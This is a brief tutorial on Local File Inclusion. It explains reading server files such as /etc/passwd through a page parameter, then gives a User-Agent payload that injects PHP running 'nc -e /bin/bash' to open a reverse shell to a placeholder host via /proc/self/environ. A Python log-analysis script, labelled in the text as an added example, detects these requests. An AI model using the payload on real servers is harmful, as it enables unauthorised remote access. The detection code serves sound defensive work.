Local File Inclusion
This vulnerability allows the attacker to read files on the server, such as /etc/passwd or others.
In the following image, changing the file that the page parameter loads lets us read other files outside the www directory, and we can try to exploit this to gain access with a shell.
Here the page parameter points to /proc/self/environ and our User-Agent is modified to:
<? passthru("nc -e /bin/bash <host> <port>"); ?>
Forward the requests and you will see that you get a shell.
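Seen from the server side, the requests described above leave a recognisable trace in the web access log. The following is an added example, not part of the original page: a small check that flags a page parameter pointing outside the web root and PHP tags in the User-Agent. The Apache combined log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: ip ident user [time] "METHOD uri PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>.*)"$'
)
PARAM = "page"  # include parameter named in the text above
SENSITIVE = ("/etc/passwd", "/proc/self/environ")  # files named in the text above
PHP_TAG = re.compile(r"<\?(php|=|\s|$)", re.I)  # PHP open tag; does not match <?xml
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")

# Constructed sample log lines (documentation IP range, harmless PHP comment as marker).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1480 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 900 "-" "<? /* constructed */ ?>"',
]

def fully_decode(value, rounds=3):
    """Undo nested URL encoding (%252e%252e -> ..) so the checks see the real path."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a sorted list of findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = set()
    for raw in parse_qs(urlsplit(m["uri"]).query, keep_blank_values=True).get(PARAM, []):
        path = fully_decode(raw).replace("\\", "/")
        if TRAVERSAL.search(path):
            findings.add("traversal")
        if path.startswith("/"):
            findings.add("absolute-path")
        if any(name in path for name in SENSITIVE):
            findings.add("sensitive-file")
    if PHP_TAG.search(m["ua"]):
        findings.add("php-in-user-agent")
    return sorted(findings)

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry), entry.split('"')[1])
```

A request that combines a sensitive-file finding with php-in-user-agent is the pattern worth alerting on first, since it matches both halves of the technique shown above.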
Examples and Info: